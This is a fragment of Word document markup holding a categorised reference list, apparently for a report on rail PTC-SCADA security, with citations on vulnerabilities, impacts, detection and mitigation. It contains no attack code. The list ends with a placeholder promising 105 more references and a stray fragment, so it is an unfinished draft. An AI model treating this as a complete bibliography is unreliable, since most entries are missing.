    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000330">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[16] IEEE, "PTC Implementation Architecture Standard," IEEE 1570-2023, Section 8.4.</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[27] Association of American Railroads, "PTC-SCADA Integration Survey Results," Member Report, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000333">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gzpv5pjfe36p" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA Platform Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000334">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[36] ICS-CERT, "GE iFIX Multiple Vulnerabilities," Advisory ICSA-24-287-02.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[37] Schneider Electric, "InTouch Security Bulletin," SEVD-2024-287-01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000337">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pylsd1vnr5tc" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact Assessments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000338">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[50] Surface Transportation Board, "Economic Impact Model: Rail Network Failure," STB Report 2024.</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[58] EPA, "Water Treatment Chemical Supply Vulnerability Assessment," EPA-817-R-25-001.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kptgb9nw1gca" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Methods</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[70] MITRE ATT&amp;CK for ICS, "Detection Techniques for SCADA Networks," Version 2.0.</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[84] NIST, "Incident Response for Control Systems," SP 800-82r3, Section 6.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o9d3at3s1op8" w:id="60"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation Guidance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000340">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[96] NCC Group, "Securing PTC-SCADA Integration Points," Technical Whitepaper, 2025.</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[97] ISA, "Security for Industrial Automation," ISA-62443-3-3:2025.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[Continue with remaining 105 references organized by category...]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bCs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